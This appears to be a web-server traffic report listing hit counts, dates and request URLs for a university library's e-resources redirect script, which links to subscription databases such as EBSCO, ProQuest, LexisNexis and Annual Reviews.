281 0.01% 5/Aug/11 05:51  /cgi-bin/eresources/remoteinfo.py?linkname=arjournals.annualreviews.org/loi/biochem&databasename=Annual Review of Biochemistry
279 0.01%14/Aug/11 22:26  /cgi-bin/eresources/remoteinfo.py?linkname=newfirstsearch.oclc.org/dbname=ClasePeriodica;FSIP&databasename=ClasePeriodica
279 0.01%14/Aug/11 15:49  /cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/login.asp?profile=novelist&databasename=NoveList
278 0.01%16/Aug/11 14:04  /cgi-bin/eresources/remoteinfo.py?linkname=www.lexisnexis.com/us/lnacademic/search/flap.do?flapID=legal&databasename=Lexis-Nexis Academic Universe - Legal Research
275 0.01% 5/Aug/11 16:36  /cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/login.asp?profile=web&defaultdb=hch&databasename=Health Source: Nursing/Academic Edition
274 0.01% 5/Aug/11 06:00  /cgi-bin/eresources/remoteinfo.py?linkname=sanborn.umi.com/&databasename=Sanborn Insurance Maps (Illinois)
273 0.01% 5/Aug/11 17:08  /cgi-bin/eresources/remoteinfo.py?linkname=cisweb.lexis-nexis.com/histuniv/&databasename=Primary Sources in African American History
272 0.01%24/Apr/08 18:04  /cgi-bin/eresources/remoteinfo.py?linkname=proquest.umi.com/login?COPT=SU5UPTAmVkVSPTImREJTPTFDNUU@&clientId=45998&dbname=proquest.umi.com/login?COPT=SU5UPTAmVkVSPTImREJTPTFDNUU@&clientId=45998
271 0.01%26/Jul/11 14:55  /cgi-bin/eresources/remoteinfo.py?linkname=proquest.umi.com/login?COPT=SU5UPTAmVkVSPTImREJTPTM4M0U@&clientId=45998&databasename=Ethnic News Watch
270 0.01% 5/Aug/11 17:43  /cgi-bin/eresources/remoteinfo.py?linkname=ChicagoStateUni.NaxosMusicLibrary.com/Jazz&databasename=Naxos Music Library - Jazz
268 0.01%16/Aug/11 12:36  /cgi-bin/eresources/remoteinfo.py?linkname=www.artstor.org&databasename=ARTstor&&dbname=www.artstor.org
268 0.01%31/Jul/11 12:30  /cgi-bin/eresources/remoteinfo.py?linkname=atoz.ebsco.com/home.asp?ID=cgcsu&databasename=EBSCO AtoZ&&dbname=atoz.ebsco.com/home.asp?ID=cgcsu
268 0.01% 6/Aug/11 22:02  /cgi-bin/eresources/remoteinfo.py?linkname=arjournals.annualreviews.org/loi/pharmtox&databasename=Annual Review of Pharmacology and Toxicology
267 0.01% 5/Aug/11 05:46  /cgi-bin/eresources/remoteinfo.py?linkname=www.statesmansyearbook.com&databasename=Statesmans Yearbook
266 0.01% 5/Aug/11 16:10  /cgi-bin/eresources/remoteinfo.py?linkname=newfirstsearch.oclc.org/dbname=IllinoisCatalog;FSIP&databasename=IllinoisCatalog
265 0.01% 5/Aug/11 16:17  /cgi-bin/eresources/remoteinfo.py?linkname=arjournals.annualreviews.org/loi/genet&databasename=Annual Review of Genetics
264 0.01%16/Aug/11 08:43  /cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/login.asp?profile=web&defaultdb=hxh&databasename=Health Source: Consumer Edition
264 0.01%19/Jun/11 06:55  /cgi-bin/eresources/remoteinfo.py?linkname=newfirstsearch.oclc.org/dbname=ABI_INFORM;FSIP&dbname=ABI Inform
264 0.01% 6/Aug/11 15:46  /cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/login.asp?profile=sas&databasename=Searchasaurus
263 0.01% 5/Aug/11 06:00  /cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/login.asp?profile=web&defaultdb=chh&databasename=Cochrane Database of Systematic Reviews
262 0.01% 5/Aug/11 13:37  /cgi-bin/eresources/remoteinfo.py?linkname=arjournals.annualreviews.org/loi/nutr&databasename=Annual Review of Nutrition
262 0.01%17/Aug/11 15:54  /cgi-bin/eresources/remoteinfo.py?linkname=arjournals.annualreviews.org/loi/micro&databasename=Annual Review of Microbiology
259 0.01%23/Jun/11 11:52  /cgi-bin/eresources/remoteinfo.py?linkname=search.epnet.com/login.asp?profile=web&defaultdb=pdh&dbname=PsycARTICLES
258 0.01% 4/Aug/11 05:01  /cgi-bin/eresources/remoteinfo.py?linkname=arjournals.annualreviews.org/loi/ento&databasename=Annual Review of Entomology
258 0.01%21/Jul/11 07:50  /cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/login.asp?profile=web&defaultdb=psyh&databasename=PsycINFO&&dbname=search.ebscohost.com/login.asp?profile=web&defaultdb=psyh
258 0.01%21/Jul/11 19:26  /cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/login.asp?profile=web&defaultdb=eric&databasename=ERIC (EBSCO)&&dbname=search.ebscohost.com/login.asp?profile=web&defaultdb=eric
257 0.01% 1/May/08 19:44  /cgi-bin/eresources/remoteinfo.py?linkname=atoz.ebsco.com/home.asp?ID=cgcsu&dbname=atoz.ebsco.com/home.asp?ID=cgcsu
257 0.01% 5/Aug/11 05:59  /cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/login.asp?profile=web&defaultdb=ulh&databasename=MAS Ultra - School Edition
256 0.01%17/Jun/11 23:56  /cgi-bin/eresources/remoteinfo.py?linkname=infoweb.newsbank.com&dbname=infoweb.newsbank.com
255 0.01% 5/Aug/11 17:18  /cgi-bin/eresources/remoteinfo.py?linkname=arjournals.annualreviews.org/loi/physiol&databasename=Annual Review of Physiology
255 0.01% 4/Aug/11 02:59  /cgi-bin/eresources/remoteinfo.py?linkname=www.annurev.org/&databasename=Annual Reviews
255 0.01% 4/Aug/11 01:38  /cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/login.asp?profile=web&defaultdb=prh&databasename=Primary Search
252 0.01% 5/Jul/11 15:43  /cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/login.asp?profile=web&defaultdb=pdh&databasename=PsycARTICLES&&dbname=search.ebscohost.com/login.asp?profile=web&defaultdb=pdh
252 0.01%13/Aug/11 00:53  /cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/login.asp?profile=web&defaultdb=cgh&databasename=Cochrane Controlled Trials Register
251 0.01% 5/Aug/11 17:59  /cgi-bin/eresources/remoteinfo.py?linkname=newfirstsearch.oclc.org/dbname=WorldAlmanac;FSIP&databasename=World Almanac
247 0.01% 3/Aug/11 01:18  /cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/login.asp?profile=web&defaultdb=ani&databasename=EBSCO Animals
246 0.01%19/Jun/11 03:42  /cgi-bin/eresources/remoteinfo.py?linkname=newfirstsearch.oclc.org/FSIP&dbname=newfirstsearch.oclc.org/FSIP
244 0.01%12/Aug/11 05:32  /cgi-bin/eresources/remoteinfo.py?linkname=chronicle.com&databasename=Chronicle of Higher Education
244 0.01% 4/Jul/11 06:59  /cgi-bin/eresources/remoteinfo.py?linkname=infoweb.newsbank.com&dbname=Newsbank
243  9/Aug/11 23:35  /cgi-bin/eresources/remoteinfo.py?linkname=www.2facts.com/Direct2.aspx?ItemID=WE57&ID=95663&databasename=Issues and Controversies
243 0.01% 5/Aug/11 14:13  /cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/login.asp?profile=web&defaultdb=hia&databasename=Historical Abstracts
243 0.01% 5/Aug/11 05:54  /cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/login.asp?profile=web&defaultdb=tfh&databasename=Professional Development Collection
237 0.01% 5/Aug/11 17:03  /cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/login.asp?profile=web&defaultdb=dah&databasename=Database of Abstracts of Reviews of Effectiveness
233 0.01% 5/Aug/11 05:55  /cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/login.asp?profile=novelistk8&databasename=Novelist K-8
230 0.01% 5/Aug/11 15:30  /cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/login.asp?profile=web&defaultdb=bwh&databasename=Regional Business News
229 0.01% 4/Jul/10 07:30  /cgi-bin/eresources/remoteinfo.py?linkname=www.2facts.com/icof/issues-home-feature.asp&databasename=Issues and Controversies
227 0.01% 5/Aug/11 14:52  /cgi-bin/eresources/remoteinfo.py?linkname=collections.carli.illinois.edu/cdm4/index_saskia.php?CISOROOT=/saskia&databasename=SASKIA Art Image Collection
227 0.01% 5/Aug/11 05:47  /cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/login.asp?profile=web&defaultdb=mzh&databasename=MLA International Bibliography
227 0.01%17/Jun/11 06:22  /cgi-bin/eresources/remoteinfo.py?linkname=gateway.ovid.com/ovidweb.cgi?T=JS&MODE=ovid&NEWS=n&PAGE=main&D=swab&databasename=Social Work Abstracts
226 0.01% 1/Jul/11 10:10  /cgi-bin/eresources/remoteinfo.py?linkname=tax.cchgroup.com/ipnetwork&databasename=CCH - Tax On The Net
223 0.01% 4/Aug/11 03:47  /cgi-bin/eresources/remoteinfo.py?linkname=newfirstsearch.oclc.org/dbname=ArticleFirst;FSIP&databasename=ArticleFirst&&dbname=newfirstsearch.oclc.org/dbname=ArticleFirst;FSIP
223  5/Aug/11 06:04  /cgi-bin/eresources/remoteinfo.py?linkname=www.lexisnexis.com/us/lnacademic/search/flap.do?flapID=companies&databasename=Lexis-Nexis Academic Universe - Business
222 0.01%21/Jul/11 12:38  /cgi-bin/eresources/remoteinfo.py?linkname=www.search.eb.com/&databasename=Encyclopedia Britannica&&dbname=www.search.eb.com/
222 0.01%10/Aug/11 00:46  /cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/login.asp?profile=web&defaultdb=funk&databasename=Funk & Wagnalls New World Encyclopedia
221 0.01%23/Jul/10 17:01  /cgi-bin/eresources/remoteinfo.py?linkname=www.2facts.com/stories/mainmenu.asp&databasename=FACTS.com
221 0.01%29/Aug/08 03:53  /cgi-bin/eresources/remoteinfo.py?linkname=newfirstsearch.oclc.org/dbname=WilsonSelectPlus;FSIP&databasename=Wilson Select Plus
221 0.01%21/Jul/11 11:04  /cgi-bin/eresources/remoteinfo.py?linkname=web.lexis-nexis.com/universe&databasename=LexisNexis Academic Universe
221  6/Jul/11 08:46  /cgi-bin/eresources/remoteinfo.py?linkname=proquest.umi.com/login?COPT=REJTPTQ2ZGUmSU5UPTAmVkVSPTI=&clientId=45998&databasename=ProQuest Dissertations & Theses
219 0.01% 3/Aug/11 03:09  /cgi-bin/eresources/remoteinfo.py?linkname=aabd.chadwyck.com/&databasename=African American Biographical Database&&dbname=aabd.chadwyck.com/
218 16/Aug/11 09:06  /cgi-bin/eresources/remoteinfo.py?linkname=online.factsandcomparisons.com&databasename=Facts & Comparisons\xae 4.0
215 0.01% 8/Aug/11 20:35  /cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/login.asp?profile=srck5&databasename=Kids Search
211 0.01%16/Aug/11 11:34  /cgi-bin/eresources/remoteinfo.py?linkname=csu4.classical.com&databasename=African-American Song Database
210 0.01% 9/Aug/11 03:41  /cgi-bin/eresources/remoteinfo.py?linkname=newfirstsearch.oclc.org/FSIP&databasename=FirstSearch databases
208  5/Aug/11 13:46  /cgi-bin/eresources/remoteinfo.py?linkname=www.NaturalDatabase.com&databasename=Natural Medicines Comprehensive Database
207 0.01% 5/Aug/11 18:17  /cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/login.asp?profile=web&defaultdb=mth&databasename=Military & Government Collection
205 0.01%24/Jun/11 13:14  /cgi-bin/eresources/remoteinfo.py?linkname=www.2facts.com/stories/mainmenu.asp&dbname=FACTS.com
199 0.01%20/Jun/11 01:54  /cgi-bin/eresources/remoteinfo.py?linkname=newfirstsearch.oclc.org/dbname=WilsonSelectPlus;FSIP&dbname=Wilson Select Plus
196 0.01%19/Jun/11 07:25  /cgi-bin/eresources/remoteinfo.py?linkname=newfirstsearch.oclc.org/dbname=ABI_INFORM;FSIP&dbname=newfirstsearch.oclc.org/dbname=ABI_INFORM;FSIP
195 14/Aug/11 23:15  /cgi-bin/eresources/remoteinfo.py?linkname=go.galegroup.com/ps/start.do?p=GVRL&u=uiuc_csu&authCount=1&databasename=Gale Virtual Reference Library
194 0.01% 3/Aug/11 20:42  /cgi-bin/eresources/remoteinfo.py?linkname=infoweb.newsbank.com&databasename=Chicago Sun Times&&dbname=infoweb.newsbank.com
194  6/Aug/11 20:08  /cgi-bin/eresources/remoteinfo.py?linkname=www.ncjrs.org/abstractdb/search.asp&databasename=National Criminal Justice Reference Service
193 0.01% 5/Jan/11 10:19  /cgi-bin/eresources/remoteinfo.py?linkname=www.2facts.com/Formslogin.asp?db=WAE&databasename=The World Almanac Encyclopaedia
193 0.01%29/Jul/10 10:17  /cgi-bin/eresources/remoteinfo.py?linkname=newfirstsearch.oclc.org/dbname=ArticleFirst;FSIP&dbname=ArticleFirst
193 0.01%24/Jun/11 21:19  /cgi-bin/eresources/remoteinfo.py?linkname=www.artstor.org&dbname=ARTstor
192 0.01% 7/Sep/08 05:44  /cgi-bin/eresources/remoteinfo.py?linkname=search.marquiswhoswho.com&databasename=Who's Who? -- Marquis Who's Who on the Web
192 16/Aug/11 10:19  /cgi-bin/eresources/remoteinfo.py?linkname=www.learnatest.com/lel/&databasename=Learning Express Library
191 0.01%19/Jun/11 16:15  /cgi-bin/eresources/remoteinfo.py?linkname=newfirstsearch.oclc.org/dbname=ERIC;FSIP&dbname=newfirstsearch.oclc.org/dbname=ERIC;FSIP
191 12/Aug/11 00:24  /cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/login.asp?profile=web&defaultdb=lih&databasename=Library, Information Science & Technology Abstracts
189 0.01%17/Jun/08 16:58  /cgi-bin/eresources/remoteinfo.py?linkname=www.pubmedcentral.nih.gov/&dbname=www.pubmedcentral.nih.gov/
188 22/Jul/11 20:03  /cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/login.asp?profile=web&defaultdb=rzh&databasename=CINAHL Plus with Full Text&&dbname=search.ebscohost.com/login.asp?profile=web&defaultdb=rzh
188 0.01%16/Jun/11 08:33  /cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/login.asp?profile=web&defaultdb=ahl&databasename=America: History and Life&&dbname=search.ebscohost.com/login.asp?profile=web&defaultdb=ahl
186 13/Aug/11 23:20  /cgi-bin/eresources/remoteinfo.py?linkname=cisweb.lexis-nexis.com/histuniv/&databasename=Lexis-Nexis Primary Sources in African American History
186 0.01%17/Jun/08 16:56  /cgi-bin/eresources/remoteinfo.py?linkname=web.lexis-nexis.com/universe&databasename=Lexis-Nexis Academic Universe - Legal Research
186 0.01% 8/Sep/08 21:50  /cgi-bin/eresources/remoteinfo.py?linkname=infotrac.galegroup.com/itweb/uiuc_csu?db=LitRC&databasename=Literature Resource Center
186 0.01% 4/Aug/11 04:12  /cgi-bin/eresources/remoteinfo.py?linkname=newfirstsearch.oclc.org/dbname=MEDLINE;FSIP&databasename=Medline&&dbname=newfirstsearch.oclc.org/dbname=MEDLINE;FSIP
185 0.01% 8/Aug/11 08:22  /cgi-bin/eresources/remoteinfo.py?linkname=atoz.ebsco.com/home.asp?ID=cgcsu'&databasename=EBSCO AtoZ HTTP/1.1
185 0.01%19/Jun/11 07:54  /cgi-bin/eresources/remoteinfo.py?linkname=newfirstsearch.oclc.org/dbname=ArticleFirst;FSIP&dbname=newfirstsearch.oclc.org/dbname=ArticleFirst;FSIP
183  4/Aug/11 06:54  /cgi-bin/eresources/remoteinfo.py?linkname=web.lexis-nexis.com/universe&databasename=Lexis-Nexis Academic Universe - General&&dbname=web.lexis-nexis.com/universe
183 0.01%11/Aug/11 23:00  /cgi-bin/eresources/remoteinfo.py?linkname=newfirstsearch.oclc.org/dbname=GPO;FSIP&databasename=GPO&&dbname=newfirstsearch.oclc.org/dbname=GPO;FSIP
182 0.01% 1/Sep/08 03:45  /cgi-bin/eresources/remoteinfo.py?linkname=pubs.acs.org/&dbname=pubs.acs.org/
182 0.01% 6/Sep/08 03:25  /cgi-bin/eresources/remoteinfo.py?linkname=pdrel.thomsonhc.com/&databasename=PDR Electronic Library
181 0.01% 1/Sep/08 03:47  /cgi-bin/eresources/remoteinfo.py?linkname=www.liebertonline.com/&dbname=www.liebertonline.com/
180  3/Aug/11 13:33  /cgi-bin/eresources/remoteinfo.py?linkname=www.pubmedcentral.nih.gov/&databasename=PubMed Central&&dbname=www.pubmedcentral.nih.gov/
180 0.01%18/Aug/11 07:07  /cgi-bin/eresources/remoteinfo.py?linkname=app.harpweek.com/&databasename=HarpWeek&&dbname=app.harpweek.com/
180 11/Aug/11 00:17  /cgi-bin/eresources/remoteinfo.py?linkname=www.credoreference.com/advanced.do&databasename=Credo Reference
180 0.01% 8/Apr/08 05:50  /cgi-bin/eresources/remoteinfo.py?linkname=proquest.umi.com/login?COPT=SU5UPTAmVkVSPTImREJTPUcw&clientId=45998&dbname=proquest.umi.com/login?COPT=SU5UPTAmVkVSPTImREJTPUcw&clientId=45998
179 0.01%19/Jun/11 15:50  /cgi-bin/eresources/remoteinfo.py?linkname=newfirstsearch.oclc.org/dbname=ERIC;FSIP&dbname=ERIC (FirstSearch)
177 0.01%24/Jun/11 13:50  /cgi-bin/eresources/remoteinfo.py?linkname=www.2facts.com/stories/mainmenu.asp&dbname=www.2facts.com/stories/mainmenu.asp
177 0.01% 3/Aug/11 17:15  /cgi-bin/eresources/remoteinfo.py?linkname=infoweb.newsbank.com&databasename=Newsbank&&dbname=infoweb.newsbank.com
177 0.01% 3/Aug/11 19:13  /cgi-bin/eresources/remoteinfo.py?linkname=www.worldcat.org&databasename=WorldCat&&dbname=www.worldcat.org
176 0.01%21/Jul/11 07:48  /cgi-bin/eresources/remoteinfo.py?linkname=www.refworks.com&databasename=RefWorks&&dbname=www.refworks.com
176  3/Aug/11 22:40  /cgi-bin/eresources/remoteinfo.py?linkname=infoweb.newsbank.com&databasename=Chicago Tribune&&dbname=infoweb.newsbank.com
175  3/Aug/11 22:04  /cgi-bin/eresources/remoteinfo.py?linkname=www.medlineplus.gov&databasename=MEDLINE Plus&&dbname=www.medlineplus.gov
175 23/Jul/11 16:37  /cgi-bin/eresources/remoteinfo.py?linkname=www.2facts.com/Formslogin.asp?db=WA&databasename=The World Almanac
174  6/Aug/11 14:23  /cgi-bin/eresources/remoteinfo.py?linkname=pubs.acs.org/&databasename=American Chemical Society Publications&&dbname=pubs.acs.org/
174  8/Aug/11 08:15  /cgi-bin/eresources/remoteinfo.py?linkname=jama.ama-assn.org/search.dtl&databasename=Journal of the American Medical Association (JAMA)
174 30/Jul/11 17:03  /cgi-bin/eresources/remoteinfo.py?linkname=bsc.chadwyck.com/search/initAdvancedSearch.do&databasename=Chicago Defender and the Daily Defender
174  4/Aug/11 05:59  /cgi-bin/eresources/remoteinfo.py?linkname=arjournals.annualreviews.org/loi/psych&databasename=Annual Review of Psychology&&dbname=arjournals.annualreviews.org/loi/psych
173 0.01% 3/Aug/11 11:42  /cgi-bin/eresources/remoteinfo.py?linkname=newfirstsearch.oclc.org/dbname=ClasePeriodica;FSIP&databasename=ClasePeriodica&&dbname=newfirstsearch.oclc.org/dbname=ClasePeriodica;FSIP
172 0.01%18/Jun/08 02:01  /cgi-bin/eresources/remoteinfo.py?linkname=cisweb.lexis-nexis.com/histuniv/&dbname=cisweb.lexis-nexis.com/histuniv/
172 0.01%19/Jun/11 11:44  /cgi-bin/eresources/remoteinfo.py?linkname=www3.interscience.wiley.com/cgi-bin/home&databasename=Wiley InterScience
171  5/Aug/11 05:54  /cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/login.aspx?authtype=ip,uid&profile=ehost&defaultdb=swh&databasename=Social Work Abstracts
171 28/Jul/10 12:59  /cgi-bin/eresources/remoteinfo.py?linkname=aabd.chadwyck.com/&dbname=African American Biographical Database
170 0.01%27/Jun/08 18:12  /cgi-bin/eresources/remoteinfo.py?linkname=web.lexis-nexis.com/universe&databasename=Lexis-Nexis Academic Universe - News
170  3/Aug/11 14:30  /cgi-bin/eresources/remoteinfo.py?linkname=newfirstsearch.oclc.org/dbname=PapersFirst;FSIP&databasename=PapersFirst&&dbname=newfirstsearch.oclc.org/dbname=PapersFirst;FSIP
170  4/Aug/11 01:53  /cgi-bin/eresources/remoteinfo.py?linkname=www.lib.niu.edu/ipo/&databasename=Illinois Periodicals Online&&dbname=www.lib.niu.edu/ipo/
168 18/Aug/11 04:41  /cgi-bin/eresources/remoteinfo.py?linkname=online.lexi.com&databasename=Lexi-Comp ONLINE&&dbname=online.lexi.com
168 0.01%10/Sep/08 13:36  /cgi-bin/eresources/remoteinfo.py?linkname=www.2facts.com/stories/digest-home-feature.asp&databasename=World News Digest
167  1/Sep/08 03:49  /cgi-bin/eresources/remoteinfo.py?linkname=sb2.abc-clio.com:81/&dbname=sb2.abc-clio.com:81/
167 23/Jun/11 13:54  /cgi-bin/eresources/remoteinfo.py?linkname=search.epnet.com/login.asp?profile=web&defaultdb=rzh&dbname=CINAHL Plus with Full Text
167 0.01% 3/Sep/08 20:39  /cgi-bin/eresources/remoteinfo.py?linkname=newfirstsearch.oclc.org/dbname=PerAbs;FSIP&databasename=PerAbs - Periodical Abstracts
167 0.01%10/Sep/08 14:31  /cgi-bin/eresources/remoteinfo.py?linkname=www.2facts.com/Formslogin.asp?db=TSOF&databasename=Today's Science
166 16/Aug/11 02:48  /cgi-bin/eresources/remoteinfo.py?linkname=www.statesmansyearbook.com&databasename=Statesmans Yearbook&&dbname=www.statesmansyearbook.com
166  1/Sep/08 03:43  /cgi-bin/eresources/remoteinfo.py?linkname=www.search.eb.com/&dbname=www.search.eb.com/
165 18/Jun/11 19:40  /cgi-bin/eresources/remoteinfo.py?linkname=newfirstsearch.oclc.org/FSIP&dbname=FirstSearch databases
165  1/Sep/08 03:49  /cgi-bin/eresources/remoteinfo.py?linkname=iimpft.chadwyck.com/&dbname=iimpft.chadwyck.com/
165 16/Aug/11 19:58  /cgi-bin/eresources/remoteinfo.py?linkname=infoweb.newsbank.com&databasename=New York Times - Current&&dbname=infoweb.newsbank.com
165 13/Aug/11 23:39  /cgi-bin/eresources/remoteinfo.py?linkname=newfirstsearch.oclc.org/dbname=ECO;FSIP&databasename=ECO: OCLC list of scholarly journals&&dbname=newfirstsearch.oclc.org/dbname=ECO;FSIP
164  1/Sep/08 03:44  /cgi-bin/eresources/remoteinfo.py?linkname=www.xreferplus.com&dbname=www.xreferplus.com
163 20/Jun/11 04:19  /cgi-bin/eresources/remoteinfo.py?linkname=newfirstsearch.oclc.org/dbname=WorldCat;FSIP&dbname=WorldCat
163  6/Aug/11 02:05  /cgi-bin/eresources/remoteinfo.py?linkname=newfirstsearch.oclc.org/dbname=Proceedings;FSIP&databasename=Proceedings&&dbname=newfirstsearch.oclc.org/dbname=Proceedings;FSIP
163  5/Aug/11 14:26  /cgi-bin/eresources/remoteinfo.py?linkname=online.sagepub.com/cgi/search&databasename=SAGE Backfiles
163 16/Aug/11 05:12  /cgi-bin/eresources/remoteinfo.py?linkname=ChicagoStateUNI.naxosmusiclibrary.com&databasename=Naxos Music Library&&dbname=ChicagoStateUNI.naxosmusiclibrary.com
162  8/Jul/11 15:54  /cgi-bin/eresources/remoteinfo.py?linkname=scholar.google.com&databasename=Google Scholar&&dbname=scholar.google.com
162 23/Jun/11 12:53  /cgi-bin/eresources/remoteinfo.py?linkname=search.epnet.com/login.asp?profile=web&defaultdb=psyh&dbname=PsycINFO
162 18/Jun/08 02:00  /cgi-bin/eresources/remoteinfo.py?linkname=abstractsdb.ncjrs.org/content/AbstractsDB_Search.asp&dbname=abstractsdb.ncjrs.org/content/AbstractsDB_Search.asp
161  1/Sep/08 03:49  /cgi-bin/eresources/remoteinfo.py?linkname=mlc.naxosmusiclibrary.com&dbname=mlc.naxosmusiclibrary.com
161  3/Aug/11 18:43  /cgi-bin/eresources/remoteinfo.py?linkname=www.kcdlonline.com/&databasename=Kraus Curriculum Development Library&&dbname=www.kcdlonline.com/
161  5/Aug/11 05:50  /cgi-bin/eresources/remoteinfo.py?linkname=www.fofweb.com/Direct2.asp?ItemID=WE00&ID=95663&databasename=FACTS.com
159  3/Aug/11 17:40  /cgi-bin/eresources/remoteinfo.py?linkname=www.xreferplus.com&databasename=Xreferplus&&dbname=www.xreferplus.com
159  1/Sep/08 03:48  /cgi-bin/eresources/remoteinfo.py?linkname=www.annurev.org/&dbname=www.annurev.org/
159  4/Aug/11 07:16  /cgi-bin/eresources/remoteinfo.py?linkname=www.ncbi.nlm.nih.gov/Literature/&databasename=NCBI (National Center for Biotechnology Information) Literature Databases&&dbname=www.ncbi.nlm.nih.gov/Literature/
158  1/Sep/08 03:45  /cgi-bin/eresources/remoteinfo.py?linkname=www.els.net/&dbname=www.els.net/
158  3/Aug/11 11:54  /cgi-bin/eresources/remoteinfo.py?linkname=www.netlibrary.com/&databasename=NetLibrary&&dbname=www.netlibrary.com/
158  3/Aug/11 12:41  /cgi-bin/eresources/remoteinfo.py?linkname=arjournals.annualreviews.org/loi/med&databasename=Annual Review of Medicine&&dbname=arjournals.annualreviews.org/loi/med
158  4/Aug/11 06:04  /cgi-bin/eresources/remoteinfo.py?linkname=www.els.net/&databasename=Encyclopedia of Life Sciences (ELS)&&dbname=www.els.net/
158 16/Aug/11 19:01  /cgi-bin/eresources/remoteinfo.py?linkname=arjournals.annualreviews.org/loi/soc&databasename=Annual Review of Sociology&&dbname=arjournals.annualreviews.org/loi/soc
157 18/Jun/08 02:00  /cgi-bin/eresources/remoteinfo.py?linkname=arjournals.annualreviews.org/loi/psych&dbname=arjournals.annualreviews.org/loi/psych
156  4/Aug/11 00:13  /cgi-bin/eresources/remoteinfo.py?linkname=www.collegesource.org/&databasename=Collegesource&&dbname=www.collegesource.org/
156  6/Aug/11 20:49  /cgi-bin/eresources/remoteinfo.py?linkname=newfirstsearch.oclc.org/dbname=WorldCat;FSIP&databasename=WorldCat&&dbname=newfirstsearch.oclc.org/dbname=WorldCat;FSIP
155  1/Sep/08 03:44  /cgi-bin/eresources/remoteinfo.py?linkname=aabd.chadwyck.com/&dbname=aabd.chadwyck.com/
155  1/Sep/08 03:48  /cgi-bin/eresources/remoteinfo.py?linkname=www.netlibrary.com/&dbname=www.netlibrary.com/
155 17/Jun/08 16:54  /cgi-bin/eresources/remoteinfo.py?linkname=newfirstsearch.oclc.org/dbname=ECO;FSIP&dbname=newfirstsearch.oclc.org/dbname=ECO;FSIP
154 24/Jun/11 08:32  /cgi-bin/eresources/remoteinfo.py?linkname=web.lexis-nexis.com/universe&dbname=Lexis-Nexis Academic Universe - News
154 25/Jun/11 08:21  /cgi-bin/eresources/remoteinfo.py?linkname=www.grovemusic.com/&databasename=Groves Music Online
154  1/Sep/08 03:47  /cgi-bin/eresources/remoteinfo.py?linkname=sanborn.umi.com/&dbname=sanborn.umi.com/
154 26/Jun/08 03:25  /cgi-bin/eresources/remoteinfo.py?linkname=pdrel.thomsonhc.com/&dbname=pdrel.thomsonhc.com/
154  3/Aug/11 18:27  /cgi-bin/eresources/remoteinfo.py?linkname=www.greeninfoonline.com/&databasename=GreenFILE&&dbname=www.greeninfoonline.com/
154  1/Sep/08 03:47  /cgi-bin/eresources/remoteinfo.py?linkname=dictionary.oed.com/&dbname=dictionary.oed.com/
153  4/Aug/11 03:51  /cgi-bin/eresources/remoteinfo.py?linkname=arjournals.annualreviews.org/loi/biochem&databasename=Annual Review of Biochemistry&&dbname=arjournals.annualreviews.org/loi/biochem
153 16/Aug/11 20:04  /cgi-bin/eresources/remoteinfo.py?linkname=www.ncbi.nlm.nih.gov/pubmed/advanced&databasename=PubMed&&dbname=www.ncbi.nlm.nih.gov/pubmed/advanced
153  3/Aug/11 03:02  /cgi-bin/eresources/remoteinfo.py?linkname=proquest.umi.com/login&databasename=ProQuest Databases&&dbname=proquest.umi.com/login
153  5/Aug/11 13:22  /cgi-bin/eresources/remoteinfo.py?linkname=go.galegroup.com/ps/start.do?p=LitRC&u=uiuc_csu&authCount=1&databasename=Literature Resource Center
153 18/Jun/08 02:00  /cgi-bin/eresources/remoteinfo.py?linkname=arjournals.annualreviews.org/loi/med&dbname=arjournals.annualreviews.org/loi/med
152 18/Aug/11 02:02  /cgi-bin/eresources/remoteinfo.py?linkname=www.doaj.org&databasename=Directory of Open Access Journals&&dbname=www.doaj.org
152  5/Jul/11 19:25  /cgi-bin/eresources/remoteinfo.py?linkname=iimpft.chadwyck.com/&databasename=International Index To Music Periodicals&&dbname=iimpft.chadwyck.com/
152 19/Jun/11 13:24  /cgi-bin/eresources/remoteinfo.py?linkname=newfirstsearch.oclc.org/dbname=BooksInPrint;FSIP&dbname=newfirstsearch.oclc.org/dbname=BooksInPrint;FSIP
151  7/Aug/11 00:36  /cgi-bin/eresources/remoteinfo.py?linkname=arjournals.annualreviews.org/loi/ento&databasename=Annual Review of Entomology&&dbname=arjournals.annualreviews.org/loi/ento
151 16/Aug/11 16:15  /cgi-bin/eresources/remoteinfo.py?linkname=bltc.alexanderstreet.com&databasename=Black Thought and Culture
151 17/Jun/08 16:54  /cgi-bin/eresources/remoteinfo.py?linkname=newfirstsearch.oclc.org/dbname=PerAbs;FSIP&dbname=newfirstsearch.oclc.org/dbname=PerAbs;FSIP
150 20/Jun/11 03:38  /cgi-bin/eresources/remoteinfo.py?linkname=newfirstsearch.oclc.org/dbname=WilsonSelectPlus;FSIP&dbname=newfirstsearch.oclc.org/dbname=WilsonSelectPlus;FSIP
150 18/Jun/08 02:00  /cgi-bin/eresources/remoteinfo.py?linkname=arjournals.annualreviews.org/loi/anthro&dbname=arjournals.annualreviews.org/loi/anthro
149 0.01%16/Aug/11 08:52  /cgi-bin/eresources/remoteinfo.py?linkname=scholar.lib.vt.edu/ejournals/JCTE/&databasename=Electronic Design Career Opportunities Supplement
